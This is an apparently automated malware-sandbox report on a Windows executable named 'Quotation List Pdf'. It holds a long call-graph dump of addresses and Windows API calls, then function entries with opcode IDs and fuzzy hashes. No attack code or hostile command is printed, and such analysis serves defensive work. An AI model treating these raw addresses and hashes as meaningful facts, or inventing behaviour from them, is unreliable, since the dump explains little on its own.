7ff76843ec00 16034->16066 16072 7ff768436b30 16035->16072 16039 7ff7684377bb 16036->16039 16040 7ff7684377a6 16036->16040 16038->16036 16043 7ff7684372e0 2 API calls 16039->16043 16042 7ff7684372e0 2 API calls 16040->16042 16045 7ff7684377b2 16042->16045 16043->16045 16047 7ff76843776e 16045->16047 16048 7ff76843ec00 4 API calls 16045->16048 16049 7ff7684377f2 16047->16049 16085 7ff7684364c0 16047->16085 16048->16047 16049->16020 16052 7ff768437862 16051->16052 16114 7ff768436ed0 16052->16114 16054 7ff768437871 16055 7ff768437892 16054->16055 16056 7ff76843ec00 4 API calls 16054->16056 16057 7ff7684364c0 2 API calls 16055->16057 16058 7ff7684378a3 16055->16058 16056->16055 16057->16058 16058->16020 16060 7ff7684f2094 16059->16060 16143 7ff7684340c0 16060->16143 16062 7ff7684f20d1 16062->16021 16064 7ff768434378 RaiseFailFastException 16063->16064 16065 7ff768434385 16063->16065 16064->16065 16068 7ff76843ecac 16066->16068 16069 7ff76843ec3b 16066->16069 16068->16035 16069->16068 16071 7ff76843ec74 16069->16071 16091 7ff76843e920 16069->16091 16071->16068 16099 7ff76843ecc0 16071->16099 16074 7ff768436b4d _swprintf_c_l 16072->16074 16073 7ff768436d11 16080 7ff7684372e0 16073->16080 16074->16073 16075 7ff768436cf0 16074->16075 16076 7ff768436cd9 RaiseFailFastException 16074->16076 16077 7ff768436ce8 16074->16077 16075->16073 16079 7ff76843ec00 4 API calls 16075->16079 16076->16075 16108 7ff768437520 16077->16108 16079->16073 16081 7ff7684372f2 16080->16081 16082 7ff768437340 16080->16082 16081->16082 16083 7ff7684364c0 2 API calls 16081->16083 16082->16047 16084 7ff76843731b 16083->16084 16084->16047 16086 7ff7684364d8 16085->16086 16087 7ff7684364e0 16085->16087 16086->16087 16088 7ff768436549 RaiseFailFastException 16086->16088 16089 7ff768436556 16086->16089 16087->16049 16088->16089 16089->16087 16090 7ff768436571 RaiseFailFastException 16089->16090 16090->16087 16095 7ff76843e944 16091->16095 16092 7ff76849b4b0 _swprintf_c_l 3 API calls 16093 7ff76843e9b4 16092->16093 16094 7ff76849b4b0 _swprintf_c_l 3 API calls 16093->16094 16097 7ff76843ea6c 16093->16097 16096 7ff76843e9df 16094->16096 16095->16092 16095->16096 16096->16097 16103 7ff76843ce60 GetCurrentThreadId 16096->16103 16097->16071 16100 7ff76843ecfa 16099->16100 16102 7ff76843ed24 16100->16102 16104 7ff76843e750 16100->16104 16102->16068 16103->16097 16106 7ff76843e77a _swprintf_c_l 16104->16106 16105 7ff76843e7a1 16105->16102 16106->16105 16107 7ff76849b4b0 _swprintf_c_l 3 API calls 16106->16107 16107->16105 16112 7ff768437533 16108->16112 16109 7ff768437673 RaiseFailFastException 16109->16112 16110 7ff7684375f2 RaiseFailFastException 16110->16112 16111 7ff768437608 RaiseFailFastException 16111->16112 16112->16109 16112->16110 16112->16111 16113 7ff7684376a1 16112->16113 16113->16075 16125 7ff768436f0a 16114->16125 16115 7ff768436f80 RaiseFailFastException 16115->16125 16116 7ff7684371f8 16117 7ff768436b30 8 API calls 16116->16117 16120 7ff7684371fe 16116->16120 16117->16120 16118 7ff7684372ca 16118->16054 16119 7ff76843724c 16122 7ff768437520 3 API calls 16119->16122 16120->16118 16124 7ff7684364c0 2 API calls 16120->16124 16121 7ff76843723d RaiseFailFastException 16121->16120 16122->16120 16123 7ff7684370d4 RaiseFailFastException 16123->16125 16127 7ff7684372a3 16124->16127 16125->16115 16125->16116 16125->16119 16125->16120 16125->16121 16125->16123 16128 7ff7684364c0 2 API calls 16125->16128 16129 7ff7684371ab RaiseFailFastException 16125->16129 16130 7ff7684371c1 RaiseFailFastException 16125->16130 16131 7ff76843ec00 4 API calls 16125->16131 16132 7ff768436750 16125->16132 16127->16054 16128->16125 16129->16125 16130->16125 16131->16125 16133 7ff7684367a7 16132->16133 16134 7ff76843677d 16132->16134 16136 7ff768436916 16133->16136 16140 7ff7684367d4 16133->16140 16135 7ff76843ec00 4 API calls 16134->16135 16135->16133 16137 7ff768436929 16136->16137 16138 7ff76843691c RaiseFailFastException 16136->16138 16139 7ff7684364c0 2 API calls 16137->16139 16138->16137 16142 7ff768436901 16139->16142 16141 7ff7684364c0 2 API calls 16140->16141 16141->16142 16142->16125 16144 7ff7684340da _swprintf_c_l 16143->16144 16147 7ff76843d3f0 RtlCaptureContext 16144->16147 16148 7ff76849b490 8 API calls 16147->16148 16149 7ff7684340e9 16148->16149 16149->16062 16155 7ff7684f4470 16150->16155 16152 7ff7684f3e47 16153 7ff768434c10 26 API calls 16152->16153 16154 7ff7684f3e6f 16153->16154 16157 7ff7684f4489 16155->16157 16156 7ff7684f4531 16156->16152 16157->16156 16159 7ff7684f5660 16157->16159 16163 7ff7684f567c 16159->16163 16160 7ff7684f583d 16161 7ff7684f5540 26 API calls 16160->16161 16162 7ff7684f5784 16161->16162 16162->16156 16163->16160 16163->16162 16165 7ff7684f5540 16163->16165 16166 7ff7684347c0 26 API calls 16165->16166 16167 7ff7684f5582 16166->16167 16168 7ff7684f55be 16167->16168 16169 7ff7684347c0 26 API calls 16167->16169 16168->16163 16169->16168 16171 7ff768525577 16170->16171 16176 7ff768548560 16171->16176 16173 7ff76852558e 16184 7ff768548ea0 16173->16184 16175 7ff76852559a 16175->15996 16195 7ff768548660 16176->16195 16178 7ff76854856f 16178->16173 16179 7ff76854856a 16179->16178 16180 7ff768434c10 26 API calls 16179->16180 16181 7ff768548598 16180->16181 16182 7ff768548660 26 API calls 16181->16182 16183 7ff7685485b2 16182->16183 16183->16173 16186 7ff768548eaa 16184->16186 16185 7ff768548eaf 16185->16175 16186->16185 16187 7ff768434c10 26 API calls 16186->16187 16188 7ff768548ed8 16187->16188 16189 7ff768548efe 16188->16189 16192 7ff768548f17 16188->16192 16203 7ff768549050 16189->16203 16191 7ff768548f0e 16191->16175 16193 7ff768434c10 26 API calls 16192->16193 16194 7ff768548f5a 16193->16194 16194->16175 16196 7ff768548683 16195->16196 16197 7ff7685486aa 16195->16197 16196->16179 16198 7ff768548741 16197->16198 16200 7ff768548760 16197->16200 16198->16179 16201 7ff7684347c0 26 API calls 16200->16201 16202 7ff76854879e 16201->16202 16202->16198 16205 7ff76854906c 16203->16205 16204 7ff7685490c8 16204->16191 16205->16204 16207 7ff7685490e0 16205->16207 16208 7ff7684347c0 26 API calls 16207->16208 16209 7ff768549115 16208->16209 16209->16204 16210 7ff768441150 16211 7ff76844116e 16210->16211 16217 7ff768441211 16211->16217 16218 7ff76843d3c0 VirtualAlloc 16211->16218 16219 7ff7684320b0 16220 7ff7684320e0 16219->16220 16221 7ff768432178 16220->16221 16224 7ff768448dcb 16220->16224 16240 7ff768448d69 16220->16240 16226 7ff768448dec 16224->16226 16225 7ff768448e55 16244 7ff7684734a0 16225->16244 16226->16225 16227 7ff768448e2e GetTickCount64 16226->16227 16236 7ff768448ed7 16226->16236 16227->16225 16239 7ff768448e42 16227->16239 16231 7ff768448e79 16235 7ff768448da0 16231->16235 16231->16236 16237 7ff768448eb3 GetTickCount64 16231->16237 16233 7ff768448d2a 16233->16221 16234 7ff768448f39 16234->16233 16264 7ff76844b8a0 16234->16264 16260 7ff768473570 16235->16260 16236->16235 16254 7ff76844f1b0 16236->16254 16237->16236 16237->16239 16239->16236 16241 7ff768448d2a 16240->16241 16242 7ff768448d6d 16240->16242 16241->16221 16242->16241 16243 7ff76844b8a0 3 API calls 16242->16243 16243->16241 16245 7ff76847355a 16244->16245 16246 7ff7684734c0 16244->16246 16245->16231 16271 7ff768442570 16246->16271 16249 7ff76847354a 16249->16231 16255 7ff768448f13 16254->16255 16256 7ff76844f1e7 16254->16256 16255->16233 16255->16234 16255->16235 16256->16255 16257 7ff768442dc0 SleepEx 16256->16257 16258 7ff76844f225 16257->16258 16258->16255 16259 7ff76845c550 3 API calls 16258->16259 16259->16255 16262 7ff768473586 16260->16262 16261 7ff7684735bd 16261->16235 16262->16261 16292 7ff768443120 WaitForSingleObject 16262->16292 16266 7ff76844b8d2 16264->16266 16269 7ff76844b943 16264->16269 16265 7ff76844ba25 16265->16233 16267 7ff76844b916 SwitchToThread 16266->16267 16268 7ff768442dc0 SleepEx 16266->16268 16266->16269 16267->16266 16268->16266 16269->16265 16270 7ff76844ba20 DebugBreak 16269->16270 16270->16265 16272 7ff7684425a7 GetCurrentProcess 16271->16272 16273 7ff76844265f GlobalMemoryStatusEx 16271->16273 16274 7ff7684425c0 16272->16274 16276 7ff7684425c8 16273->16276 16274->16273 16274->16276 16275 7ff76849b490 8 API calls 16277 7ff768442738 16275->16277 16276->16275 16277->16249 16278 7ff768448800 16277->16278 16279 7ff768448818 16278->16279 16288 7ff768443120 WaitForSingleObject 16279->16288 16293 7ff76844cb8f 16294 7ff76844cb94 16293->16294 16301 7ff768471970 16294->16301 16296 7ff76844cc9d 16297 7ff76844ccc8 16296->16297 16309 7ff768464960 16296->16309 16313 7ff768454420 16297->16313 16300 7ff76844cd32 16302 7ff768471989 16301->16302 16308 7ff768471999 16301->16308 16302->16296 16303 7ff768471adb SwitchToThread 16303->16308 16304 7ff7684719e9 SwitchToThread 16304->16308 16305 7ff768471ae7 16305->16296 16306 7ff768471a90 SwitchToThread 16306->16308 16307 7ff768471aa6 SwitchToThread 16307->16308 16308->16303 16308->16304 16308->16305 16308->16306 16308->16307 16310 7ff76846497e 16309->16310 16312 7ff7684649e9 _swprintf_c_l 16309->16312 16310->16312 16318 7ff7684430b0 VirtualAlloc 16310->16318 16312->16297 16314 7ff768464960 2 API calls 16313->16314 16315 7ff768454455 _swprintf_c_l 16314->16315 16316 7ff768471970 4 API calls 16315->16316 16317 7ff7684545a5 16316->16317 16317->16300 16317->16317 16319 7ff7684430fc 16318->16319 16320 7ff7684430eb 16318->16320 16319->16312 16320->16319 16321 7ff7684430f0 VirtualUnlock 16320->16321 16321->16319 16322 7ff7684638b0 16323 7ff7684638ed 16322->16323 16325 7ff768463917 16322->16325 16324 7ff768442570 10 API calls 16323->16324 16324->16325 16326 7ff76844f97d 16329 7ff768471b20 16326->16329 16328 7ff76844f95b 16332 7ff76844c690 16329->16332 16331 7ff768471b5a 16331->16328 16333 7ff76844c6da 16332->16333 16334 7ff768471970 4 API calls 16333->16334 16338 7ff76844c7b1 16333->16338 16339 7ff76844c7eb _swprintf_c_l 16334->16339 16335 7ff768464960 2 API calls 16336 7ff76844c9d3 16335->16336 16337 7ff768454420 6 API calls 16336->16337 16336->16338 16337->16338 16338->16331 16339->16335 16339->16336 16340 7ff7684ff860 16353 7ff768433630 16340->16353 16342 7ff7684ff880 16369 7ff768433e40 16342->16369 16346 7ff7684ff8a6 16347 7ff7684347c0 26 API calls 16346->16347 16351 7ff7684ff8b8 16347->16351 16348 7ff7684ff8d9 16385 7ff7684f15d0 16348->16385 16351->16348 16381 7ff7684ffbb0 16351->16381 16352 7ff7684ff8e6 16354 7ff76843368e 16353->16354 16355 7ff76843365f 16353->16355 16354->16342 16355->16354 16356 7ff76843371f 16355->16356 16358 7ff768433706 16355->16358 16364 7ff7684336e7 16355->16364 16365 7ff7684336c8 16355->16365 16357 7ff768433726 16356->16357 16361 7ff76843373f 16356->16361 16360 7ff76843d250 2 API calls 16357->16360 16393 7ff7684379b0 16358->16393 16363 7ff768433732 RaiseFailFastException 16360->16363 16362 7ff768433765 16361->16362 16399 7ff7684334c0 GetLastError 16361->16399 16362->16342 16363->16361 16364->16358 16368 7ff7684336f9 RaiseFailFastException 16364->16368 16367 7ff7684336d0 Sleep 16365->16367 16367->16364 16367->16367 16368->16358 16370 7ff76849b4b0 _swprintf_c_l 3 API calls 16369->16370 16371 7ff768433e5a 16370->16371 16372 7ff7684ffa00 16371->16372 16380 7ff7684ffa3c 16372->16380 16375 7ff7684ffb17 16376 7ff7684347c0 26 API calls 16375->16376 16379 7ff7684ffb26 16376->16379 16378 7ff7684ffb33 16378->16346 16379->16378 16410 7ff768500b20 16379->16410 16380->16375 16380->16379 16405 7ff768433dd0 16380->16405 16382 7ff7684ffbd8 16381->16382 16384 7ff7684ffc08 16382->16384 16418 7ff7684ffdc0 16382->16418 16384->16351 16387 7ff7684f15da 16385->16387 16386 7ff7684f15df 16386->16352 16387->16386 16388 7ff768434c10 26 API calls 16387->16388 16390 7ff7684f1604 16388->16390 16389 7ff7684f161f 16389->16352 16390->16389 16391 7ff768434c10 26 API calls 16390->16391 16392 7ff7684f1644 16391->16392 16394 7ff7684379d6 16393->16394 16398 7ff7684379f4 16394->16398 16402 7ff76843ccd0 FlsGetValue 16394->16402 16396 7ff7684379ec 16397 7ff768432ab0 6 API calls 16396->16397 16397->16398 16398->16356 16400 7ff7684334e4 SetLastError 16399->16400 16403 7ff76843ccea RaiseFailFastException 16402->16403 16404 7ff76843ccf8 FlsSetValue 16402->16404 16403->16404 16414 7ff76843f0e0 16405->16414 16408 7ff76849b4b0 _swprintf_c_l 3 API calls 16409 7ff768433dfa 16408->16409 16409->16380 16411 7ff768500b31 16410->16411 16412 7ff768434c10 26 API calls 16411->16412 16413 7ff768500b44 16412->16413 16415 7ff76843f10c 16414->16415 16417 7ff768433ddf 16414->16417 16416 7ff76849b4b0 _swprintf_c_l 3 API calls 16415->16416 16415->16417 16416->16417 16417->16408 16419 7ff7684347c0 26 API calls 16418->16419 16422 7ff7684ffe06 16419->16422 16420 7ff7684fff0f 16420->16384 16422->16420 16423 7ff768432350 16422->16423 16424 7ff768432396 16423->16424 16427 7ff7684320b0 16424->16427 16426 7ff7684323a6 16426->16422 16428 7ff7684320e0 16427->16428 16429 7ff768432178 16428->16429 16430 7ff768448dcb 18 API calls 16428->16430 16431 7ff768448d69 3 API calls 16428->16431 16429->16426 16430->16429 16431->16429 16432 7ff768436342 16433 7ff768436350 16432->16433 16436 7ff7684f1660 16433->16436 16434 7ff7684413e7 16437 7ff7684f1679 16436->16437 16440 7ff7684f1760 16437->16440 16439 7ff7684f1689 16439->16434 16441 7ff7684f1799 16440->16441 16443 7ff7684f1776 16440->16443 16445 7ff7684f1800 16441->16445 16443->16439 16444 7ff7684f17ad 16444->16439 16447 7ff7684f1822 16445->16447 16446 7ff7684f1882 16446->16444 16447->16446 16448 7ff7684f1966 16447->16448 16450 7ff768434c10 26 API calls 16447->16450 16449 7ff768434c10 26 API calls 16448->16449 16451 7ff7684f1979 16449->16451 16450->16448 16452 7ff7684344a0 16453 7ff7684379b0 9 API calls 16452->16453 16454 7ff7684344b2 16453->16454 16457 7ff7684f1de0 16454->16457 16458 7ff768433630 16 API calls 16457->16458 16459 7ff7684f1e01 16458->16459 16464 7ff7684dce60 16459->16464 16462 7ff7684f1e06 16467 7ff768434600 16462->16467 16472 7ff7684345d0 16462->16472 16476 7ff7684dcfb0 16464->16476 16466 7ff7684dce70 16466->16462 16469 7ff768434610 16467->16469 16468 7ff76843461c WaitForSingleObjectEx 16468->16469 16471 7ff768434654 16468->16471 16469->16468 16470 7ff768434645 16469->16470 16470->16462 16471->16462 16473 7ff7684345e6 16472->16473 16474 7ff768440fba 16473->16474 16475 7ff768440fc1 SetEvent 16473->16475 16474->16462 16475->16462 16478 7ff7684dcfdc 16476->16478 16477 7ff7684dd04e 16477->16466 16478->16477 16479 7ff7684dd022 CoInitializeEx 16478->16479 16480 7ff7684dd039 16479->16480 16481 7ff7684dd03d 16480->16481 16484 7ff7684dd050 16480->16484 16481->16477 16488 7ff7684dd0d0 16481->16488 16483 7ff7684dd0ae 16485 7ff768434c10 26 API calls 16483->16485 16484->16477 16484->16483 16486 7ff768434c10 26 API calls 16484->16486 16487 7ff7684dd0ce 16485->16487 16486->16483 16489 7ff7684dd0f6 16488->16489 16490 7ff7684dd129 CoUninitialize 16489->16490 16491 7ff7684dd137 16489->16491 16490->16491 16491->16477 16492 7ff768462aa0 16493 7ff768462abd 16492->16493 16514 7ff768442dd0 VirtualAlloc 16493->16514 16495 7ff768462ae3 16517 7ff768442b70 InitializeCriticalSection 16495->16517 16497 7ff768462b2d 16498 7ff768462f53 16497->16498 16518 7ff7684731f0 16497->16518 16500 7ff768462b5c _swprintf_c_l 16513 7ff768462d9a 16500->16513 16528 7ff7684627b0 16500->16528 16502 7ff768462d2f 16503 7ff768442ee0 3 API calls 16502->16503 16504 7ff768462d69 16503->16504 16504->16513 16532 7ff768462f80 16504->16532 16506 7ff768462d8b 16507 7ff768462d8f 16506->16507 16509 7ff768462dbe 16506->16509 16587 7ff768442ec0 VirtualFree 16507->16587 16509->16513 16549 7ff768475e20 16509->16549 16515 7ff768442e09 16514->16515 16516 7ff768442df1 VirtualFree 16514->16516 16515->16495 16516->16495 16517->16497 16519 7ff76847321f 16518->16519 16520 7ff76847324c 16519->16520 16521 7ff768473242 16519->16521 16526 7ff768473277 16519->16526 16522 7ff768442ee0 3 API calls 16520->16522 16588 7ff768442f60 16521->16588 16525 7ff76847325d 16522->16525 16525->16526 16599 7ff768442ec0 VirtualFree 16525->16599 16526->16500 16530 7ff7684627cf 16528->16530 16531 7ff7684627eb 16530->16531 16600 7ff768442450 16530->16600 16531->16502 16533 7ff768462fb5 16532->16533 16534 7ff768462fb9 16533->16534 16542 7ff768462fd3 16533->16542 16535 7ff76849b490 8 API calls 16534->16535 16536 7ff768462fcb 16535->16536 16536->16506 16537 7ff76846301e EnterCriticalSection 16537->16542 16538 7ff76846305e LeaveCriticalSection 16540 7ff768442e10 3 API calls 16538->16540 16539 7ff768463169 LeaveCriticalSection 16544 7ff7684630af 16539->16544 16547 7ff76846317e 16539->16547 16540->16542 16541 7ff76849b490 8 API calls 16543 7ff768463140 16541->16543 16542->16537 16542->16538 16542->16539 16542->16544 16545 7ff768463148 EnterCriticalSection 16542->16545 16543->16506 16544->16541 16545->16539 16547->16544 16548 7ff7684631a3 EnterCriticalSection LeaveCriticalSection 16547->16548 16607 7ff768442ea0 VirtualFree 16547->16607 16548->16547 16608 7ff768475d60 16549->16608 16552 7ff7684621b0 16555 7ff768462218 16552->16555 16553 7ff768462774 16626 7ff7684422f0 CloseHandle 16553->16626 16554 7ff768462780 16557 7ff768462789 16554->16557 16558 7ff768462795 16554->16558 16585 7ff768462241 16555->16585 16612 7ff768442390 16555->16612 16627 7ff7684422f0 CloseHandle 16557->16627 16558->16513 16561 7ff768462282 16562 7ff768442390 4 API calls 16561->16562 16561->16585 16563 7ff768462298 _swprintf_c_l 16562->16563 16564 7ff768442570 10 API calls 16563->16564 16563->16585 16565 7ff7684625a6 16564->16565 16566 7ff768442390 4 API calls 16565->16566 16567 7ff76846261e 16566->16567 16568 7ff768462660 16567->16568 16571 7ff768442390 4 API calls 16567->16571 16569 7ff76846272c 16568->16569 16570 7ff768462720 16568->16570 16568->16585 16573 7ff768462735 16569->16573 16574 7ff768462741 16569->16574 16622 7ff7684422f0 CloseHandle 16570->16622 16575 7ff768462634 16571->16575 16623 7ff7684422f0 CloseHandle 16573->16623 16577 7ff76846274a 16574->16577 16578 7ff768462756 16574->16578 16575->16568 16617 7ff768442310 16575->16617 16624 7ff7684422f0 CloseHandle 16577->16624 16580 7ff76846275f 16578->16580 16578->16585 16625 7ff7684422f0 CloseHandle 16580->16625 16583 7ff76846264a 16583->16568 16584 7ff768442390 4 API calls 16583->16584 16584->16568 16585->16553 16585->16554 16586 7ff7684626ff 16585->16586 16586->16513 16587->16513 16589 7ff768442f8e LookupPrivilegeValueW 16588->16589 16590 7ff768443026 GetLargePageMinimum 16588->16590 16591 7ff768442faa GetCurrentProcess OpenProcessToken 16589->16591 16592 7ff76844305f 16589->16592 16593 7ff768443046 VirtualAlloc 16590->16593 16594 7ff768443063 GetCurrentProcess VirtualAllocExNuma 16590->16594 16591->16592 16595 7ff768442fe1 AdjustTokenPrivileges GetLastError CloseHandle 16591->16595 16597 7ff76849b490 8 API calls 16592->16597 16593->16592 16594->16592 16595->16592 16596 7ff76844301b 16595->16596 16596->16590 16596->16592 16598 7ff768443096 16597->16598 16598->16525 16599->16526 16601 7ff768442458 16600->16601 16602 7ff768442471 GetLogicalProcessorInformation 16601->16602 16605 7ff76844249d 16601->16605 16603 7ff768442492 GetLastError 16602->16603 16604 7ff7684424a4 16602->16604 16603->16604 16603->16605 16604->16605 16606 7ff7684424e1 GetLogicalProcessorInformation 16604->16606 16605->16531 16606->16605 16607->16547 16609 7ff768475d79 16608->16609 16611 7ff768462f32 16608->16611 16610 7ff768475d90 GetEnabledXStateFeatures 16609->16610 16609->16611 16610->16611 16611->16552 16613 7ff76849b4b0 _swprintf_c_l 3 API calls 16612->16613 16614 7ff7684423b6 16613->16614 16615 7ff7684423be CreateEventW 16614->16615 16616 7ff7684423e0 16614->16616 16615->16616 16616->16561 16618 7ff76849b4b0 _swprintf_c_l 3 API calls 16617->16618 16619 7ff768442336 16618->16619 16620 7ff76844233e CreateEventW 16619->16620 16621 7ff76844235e 16619->16621 16620->16621 16621->16583 16622->16569 16623->16574 16624->16578 16625->16585 16626->16554 16627->16558 16628 7ff76844b740 16629 7ff76844b74b 16628->16629 16630 7ff76844b750 16629->16630 16637 7ff76843df20 16629->16637 16632 7ff76844b789 16633 7ff768442750 14 API calls 16632->16633 16634 7ff76844b7db 16633->16634 16635 7ff768444a40 18 API calls 16634->16635 16636 7ff76844b7e7 16635->16636 16638 7ff76843df2d 16637->16638 16641 7ff768437f30 16638->16641 16642 7ff768437f72 16641->16642 16643 7ff768437f96 FlushProcessWriteBuffers 16642->16643 16645 7ff768437fb3 16643->16645 16644 7ff768438099 16645->16644 16647 7ff768438029 SwitchToThread 16645->16647 16648 7ff768433000 16645->16648 16647->16645 16649 7ff768433027 16648->16649 16650 7ff768433007 16648->16650 16649->16645 16650->16649 16651 7ff76843cef1 LoadLibraryExW GetProcAddress 16650->16651 16664 7ff76843cff4 16650->16664 16653 7ff76843cfdd GetProcAddress 16651->16653 16654 7ff76843cf25 GetCurrentProcess 16651->16654 16652 7ff76843d055 SuspendThread 16655 7ff76843d0b9 16652->16655 16656 7ff76843d063 GetThreadContext 16652->16656 16653->16664 16661 7ff76843cf3a _swprintf_c_l 16654->16661 16659 7ff76849b490 8 API calls 16655->16659 16657 7ff76843d0b0 ResumeThread 16656->16657 16658 7ff76843d083 16656->16658 16657->16655 16658->16657 16660 7ff76843d0c9 16659->16660 16660->16645 16661->16653 16662 7ff76843cf71 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 16661->16662 16662->16653 16663 7ff76843d049 16662->16663 16663->16652 16663->16655 16664->16652 16664->16655 16665 7ff76843d03e GetLastError 16664->16665 16665->16663 16666 7ff76844eb61 16668 7ff76844eb80 16666->16668 16669 7ff76844ebe2 16668->16669 16690 7ff768467bb0 16668->16690 16678 7ff76844eb22 16669->16678 16681 7ff76844f800 16669->16681 16671 7ff76844ed04 16673 7ff76844f1b0 3 API calls 16671->16673 16672 7ff76844ec2f 16673->16678 16674 7ff76844ec69 16675 7ff7684734a0 14 API calls 16674->16675 16680 7ff76844ecb8 16674->16680 16676 7ff76844ec9b 16675->16676 16676->16678 16679 7ff768467bb0 GetTickCount64 16676->16679 16676->16680 16677 7ff768473570 WaitForSingleObject 16677->16678 16678->16672 16678->16677 16679->16680 16680->16669 16680->16671 16680->16678 16682 7ff76844f842 16681->16682 16683 7ff76844f927 16682->16683 16684 7ff76844f8d6 16682->16684 16689 7ff76844f915 16682->16689 16685 7ff768448800 WaitForSingleObject 16683->16685 16683->16689 16686 7ff76844f8e5 SwitchToThread 16684->16686 16687 7ff76844f8f3 16685->16687 16686->16687 16688 7ff76845c550 3 API calls 16687->16688 16687->16689 16688->16689 16689->16678 16691 7ff768467bf2 16690->16691 16692 7ff768467bce 16690->16692 16691->16692 16693 7ff768467c16 GetTickCount64 16691->16693 16692->16674 16693->16692 16694 7ff768467c31 16693->16694 16694->16692

                                                      Executed Functions

                                                      Function 00007FF768442B90 Relevance: 10.6, APIs: 7, Instructions: 120COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF76843D11A), ref: 00007FF768442B9F
                                                      • GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF76843D11A), ref: 00007FF768442BDD
                                                      • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF76843D11A), ref: 00007FF768442C09
                                                      • GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF76843D11A), ref: 00007FF768442C1A
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF76843D11A), ref: 00007FF768442C29
                                                      • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF76843D11A), ref: 00007FF768442CC0
                                                      • GetProcessAffinityMask.KERNEL32 ref: 00007FF768442CD3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: Process$AffinityCurrent$ErrorGroupHighestInfoLastMaskNodeNumaNumberSystem
                                                      • String ID:
                                                      • API String ID: 580471860-0
                                                      • Opcode ID: 4c9e7b62ca1d93063124db9da2326d3f3828c88f021132ba50495a9616bc8b52
                                                      • Instruction ID: 9b8183c0ac17ebb9f1092c45e70aefac21c1a0cb1ba1fe872e6c4ad06264c2c7
                                                      • Opcode Fuzzy Hash: 4c9e7b62ca1d93063124db9da2326d3f3828c88f021132ba50495a9616bc8b52
                                                      • Instruction Fuzzy Hash: 04519171A08BA6C6EB50AF19E4401B9E7A2FF58744FC80035D94D87366EF3DE509CB68
                                                      Function 00007FF768438130 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 105COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00007FF76843D0F0: FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF76843813F,?,?,?,?,?,?,00007FF768432000), ref: 00007FF76843D0FB
                                                        • Part of subcall function 00007FF76843D0F0: QueryInformationJobObject.KERNEL32 ref: 00007FF76843D1CE
                                                        • Part of subcall function 00007FF76843CE80: GetModuleHandleExW.KERNEL32(?,?,?,?,00007FF768438168,?,?,?,?,?,?,00007FF768432000), ref: 00007FF76843CE91
                                                      • RtlAddVectoredExceptionHandler.NTDLL ref: 00007FF7684381C9
                                                      • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00007FF768432000), ref: 00007FF7684382B3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: Exception$AllocFailFastHandleHandlerInformationModuleObjectQueryRaiseVectored
                                                      • String ID: The required instruction sets are not supported by the current CPU.$StressLogLevel$TotalStressLogSize
                                                      • API String ID: 2052584837-2841289747
                                                      • Opcode ID: d0ac9821fb6c0add4b9ebbe98daa48ccbd8c985c351c2d863065a78766f66ba6
                                                      • Instruction ID: febf591ca18e350b6a8e7ed39aaaa972fe4a62643aecd3aa2a183da4e24ab41e
                                                      • Opcode Fuzzy Hash: d0ac9821fb6c0add4b9ebbe98daa48ccbd8c985c351c2d863065a78766f66ba6
                                                      • Instruction Fuzzy Hash: EE415F21A4CA42C2FA11BF62D5012B9EBA1AF517C4FC84131E94D5769BDF2CE445C738
                                                      Function 00007FF76849BDA4 Relevance: 3.2, APIs: 2, Instructions: 199COMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
